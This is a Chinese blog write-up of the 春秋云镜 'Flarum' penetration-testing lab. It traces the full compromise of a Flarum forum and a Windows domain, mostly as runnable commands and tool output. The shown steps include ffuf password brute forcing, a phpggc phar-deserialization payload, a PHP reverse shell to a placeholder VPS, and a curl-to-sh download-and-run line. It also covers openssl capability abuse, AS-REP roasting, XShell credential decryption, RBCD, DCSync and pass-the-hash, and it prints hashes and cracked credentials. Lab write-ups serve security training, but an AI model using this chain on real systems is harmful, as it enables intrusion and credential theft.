v2ish1yan`s blog

春秋云镜Flarum-wp

密码爆破进入后台
Flarum的phar反序列化进行反弹shell
capabilitites提权
AS_REP Roasting爆破用户凭据
XShell凭据解密
RBCD攻击拿下FILESERVER主机
DCSync获取域管凭据

密码爆破进入后台

先扫描一下端口

rustscan -a 39.99.228.28 -r 1-65535

Open 39.99.228.28:25
Open 39.99.228.28:22
Open 39.99.228.28:110
Open 39.99.228.28:80

就只开了4个端口，且此主机是linux机器

80端口是用Flarum框架搭的社区

没有找到什么可以利用的前台漏洞，只有从后台入手了。

因为注册的话需要激活，而这个站是发不了邮件的，所以得利用此网站现有的用户进行操作。

在注册账户的时候，他会先检测用户名是否存在，利用这点进行爆破用户名

数据包如下

在扫目录的时候，看到一个/api路径，里面显示了管理员的邮箱

利用上面的数据包可以检测发现administrator用户存在

开始爆破密码

最开始用10w的字典没爆出来，然后换成rockyou.txt才爆破出来，密码为1chris

但是用bp加载这个200多mb的字典太慢了，也可以使用ffuf

1 2	ffuf -u http://39.99.228.28/login -X POST -H "Content-Type: application/json" -d '{"identification":"administrator","password":"FUZZ","remember":false}' -w rockyou.txt -v -fc 401

登录进入后台

Flarum的phar反序列化进行反弹shell

p牛有一篇关于flarum后台漏洞的文章：从偶遇Flarum开始的RCE之旅

利用方式即:

利用@import来控制css文件头的内容，来使tar格式的phar文件能够成功反序列化
利用data-uri函数来读取文件，并通过phar://来进行phar反序列化

先用phpgcc生成一个tar格式的phar文件，内容为执行反弹shell的命令

这里我看别人的wp才知道，不能直接直接命令来弹shell，需要通过其他方式

先在一个端口开http服务，放入弹shell的命令文件

1	php -r '$sock=fsockopen("vpsip",9010);exec("/bin/sh -i <&3 >&3 2>&3");'

然后再反序列化执行命令，将其下载下来再执行，进行反弹shell

1	php phpggc -p tar -b Monolog/RCE6 system "curl x.x.x.x:9020/1.txt\|sh"

后台修改：

@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NjYAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADE0NTE1NDUwNTUzADAwMDYyNzEgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuc（略）AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';

在/assets/forum.css可以看到phar文件已经被写入了

再修改自定义CSS，使用phar协议包含这个文件（可以使用相对路径）：这个路径一定要写对，否则执行不了【md

1
2
3

.test {
content: data-uri('phar://./assets/forum.css');
}

得到反弹shell

capabilitites提权

尝试查找suid文件进行提权

1	find / -user root -perm -4000 -print 2>/dev/null

发现没有可用的

再查找capabilities权限的文件

$ getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/openssl =ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep

发现openssl有cap权限，可用用来读取flag文件

这个gtf网站上居然没有记录

1 2	openssl req -x509 -newkey rsa:2048 -keyout /tmp/key.pem -out /tmp/cert.pem -days 365 -nodes openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 8080 -HTTP

然后访问web服务获得flag01

1	curl --http0.9 -k "https://39.99.228.28:8080/root/flag/flag01.txt"

AS_REP Roasting爆破用户凭据

下载fscan，扫描一下内网

$ ./fscan_386 -h 172.22.60.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.8     is alive
(icmp) Target 172.22.60.15    is alive
(icmp) Target 172.22.60.42    is alive
(icmp) Target 172.22.60.52    is alive
[*] Icmp alive hosts len is: 4
172.22.60.52:8080 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.8:139 open
172.22.60.15:139 open
172.22.60.15:135 open
172.22.60.42:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.42:139 open
172.22.60.8:135 open
172.22.60.8:88 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.173.143
[*] NetBios: 172.22.60.42    XIAORANG\FILESERVER            
[*] NetBios: 172.22.60.8     [+]DC XIAORANG\DC              
[*] NetInfo:
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.93.169
[*] NetInfo:
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.145.23
[*] NetBios: 172.22.60.15    XIAORANG\PC1                   
[*] WebTitle: http://172.22.60.52       code:200 len:5867   title:霄壤社区

梳理如下

172.22.60.8 域控
172.22.60.15 域内主机
172.22.60.42 FILESERVER服务器
172.22.60.52 当前主机

现在需要找到域内的用户信息，在网站后台可以发现有很多的用户，试试这些用户能不能利用起来

写一个一句话木马到assets目录下，用蚁剑连接，然后将数据库用户名脱下来

在config.php能看到数据库密码

然后进行kerberos的AS_REP Roasting攻击（在之前需要上传frp进行内网穿透）

来筛选出没有开启预身份验证的用户，并获得可以用hashcat爆破的加密字符串

1	proxychains4 -q python GetNPUsers.py -dc-ip 172.22.60.8 -usersfile dict/users.txt -format hashcat xiaorang.lab/

获得了两串hash，用hashcat爆破

1
2

$krb5asrep$23$wangyun@XIAORANG.LAB:3e2df6b56d1730e6a7b97328d794d461$00b66b8217f501f1b0cfc68906c84934baff6a70e2edbcc9a3a5d510efd75fc3b41a9180f9d2d53d292e6da976c1edda6c59fcd352a58bd0393fd53c8071e8bb2fab30fd6b235782540c51ddb4eca663ca8aaefcf67a0a6b98372603410f10b6fe975049601f5cbff3038732bbdcadb07f9004d3e064b53f09e20b2d823557719568795c49c13ebb25f6c1d508a82475f8050eb215b9a612f64ceb7d3687948565266253263f0269ecc5063bebd268db81bf7998ea5afab00f40bf4b66c8c6d00d16faf0a8e4f7a824a19afc2b46a03f40302c2861768b9e5a38cfb4ae8f351275ffd0eb5e7c0bd869accb6e
$krb5asrep$23$zhangxin@XIAORANG.LAB:202d5c631a9b688e65779fb379d95db0$ad69eb81483f26b3712686c18453e4093cdf63ab414fb4b0de9d1d05b4a33fd9bc45893f818da82f9926121165c37a2aea7f592dc5ec253d8f04d9b59ab8263a0f1cc0d3228db589c84548cda55b88c702a3826c2378fbc12e656ab892fdeadbcf0fa6a10595da66e62a02d68fb1db5b4bbaa0dccceeb23583fb32877f76c02f150dd432a7d0a6742de3c2e84d975272b6f4e1fac657ff692f2eba675b6b36056bad27a277a86cc662eb74e365300c344899de029371fdd63d972488d0bf4a1dcf23ade76d9e65fa54a2bbcf0899d930e2f75dd006adc86c05751bbae0b7517263766139182b6eb0fdd75962

1	hashcat -a 0 -m 18200 hash.txt rockyou.txt -o 2.txt

爆破出一个用户凭据wangyun/Adm12geC，然后用这个凭据跑Bloodhound进行域内信息收集

1	proxychains4 -q python3 bloodhound.py -u wangyun@xiaorang.lab -p Adm12geC --zip -d xiaorang.lab -c All -ns 172.22.60.8 --dns-tcp

可以发现 FILESERVER主机有DCSync权限

然后可以看到ZHANGXIN用户属于account operators组，对FILESERVER机器用户有GenericAll权限

所有现在需要拥有ZHANGXIN用户的凭据

扫描发现，172.22.60.15主机是开了3389端口的

使用wangyun/Adm12geC登录PC1

XShell凭据解密

在里面看到了ZHANGXIN的用户文件夹

同时zhangxin还用xshell连接过其他机器

如果要用mimikatz来抓取本地凭证的话，需要有system权限，所以尝试使用xshell7里遗留的凭证来撞库

使用SharpXDecrypt

得到zhangxin的凭据：zhangxin/admin4qwY38cc

使用这个凭据可以成功登录当前主机

RBCD攻击拿下FILESERVER主机

现在看来，最大的突破点就是zhangxin是Acount Operators组的用户，而此组可以控制域内除域控之外所有用户的属性

所有可以通过RBCD（基于资源的约束性委派）进行攻击

参考：

先创一个机器账户

1	proxychains4 -q python addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -computer-name TEST\$ -computer-pass 123456 -dc-ip 172.22.60.8

然后将FILESERVER$账户的基于资源的约束性委派对象设置为TEST$

即设置他的msDS-AllowedToActOnBehalfOfOtherIdentity属性值

这样TEST$服务就可以代表FILESERVER$去访问FILESERVER可以访问的服务了

1	proxychains4 -q python rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to FILESERVER\$ -delegate-from TEST\$

然后创建一个访问FILESERVER主机CIFS服务的服务票据

1	proxychains4 -q python getST.py xiaorang.lab/TEST\$:123456 -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator -dc-ip 172.22.60.8

导入票据，直接登录FILESERVER主机，要修改一下hosts文件

1
2
3

export KRB5CCNAME=administrator.ccache

proxychains4 -q python3 wmiexec.py -k FILESERVER.xiaorang.lab -no-pass

得到flag03: flag{9cc56fb3-e9b1-4345-8e1c-18ed495811a8}

DCSync获取域管凭据

上面知道，FILESERVE有DCSync权限，可以用这个来获取全域的用户凭据

先dumphash，来到FILESERVE$账户的凭据

1 2	┌──(kali㉿kali)-[~/Desktop/tools/impacket-0.10.0/examples] └─$ proxychains4 -q python3 secretsdump.py -k FILESERVER.xiaorang.lab -no-pass -dc-ip 172.22.60.8

proxychains4 -q python3 secretsdump.py -k FILESERVER.xiaorang.lab -no-pass -dc-ip 172.22.60.8
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM 
 0000   8B 14 51 59 D7 67 45 80  9F 4A 54 4C 0D E1 D3 29   ..QY.gE..JTL...)
 0010   3E B6 CC 22 FF B7 C5 74  7F E4 B0 AD E7 FA 90 0D   >.."...t........
 0020   1B 77 20 D5 A6 67 31 E9  9E 38 DD 95 B0 60 32 C4   .w ..g1..8...`2.
 0030   BE 8E 72 4D 0D 90 01 7F  01 30 AC D7 F8 4C 2B 4A   ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

然后进行DCSync，获取域管的凭据

┌──(kali㉿kali)-[~/Desktop/tools/impacket-0.10.0/examples]
└─$ proxychains4 -q python3 secretsdump.py  xiaorang.lab/FILESERVER\$@172.22.60.8 -hashes :951d8a9265dfb652f42e5c8c497d70dc  -no-pass -dc-ip 172.22.60.8 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683
Administrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9
Administrator:des-cbc-md5:f72a9889a18cc408
[*] Cleaning up...

hash传递，登录域管

1	proxychains4 python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b administrator@172.22.60.8

获得flag04: flag{4635667c-14e5-487d-a447-7bc82b2b0a0c}

还有一个flag应该在PC1，直接使用域管的hash进行访问

1	proxychains4 -q python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.15

拿到flag02: flag{9fb4e376-0e89-4fbb-8ab4-625f8b7d7d0b}

2024-03-01 该篇文章被 v2ish1yan 归为分类: 春秋云镜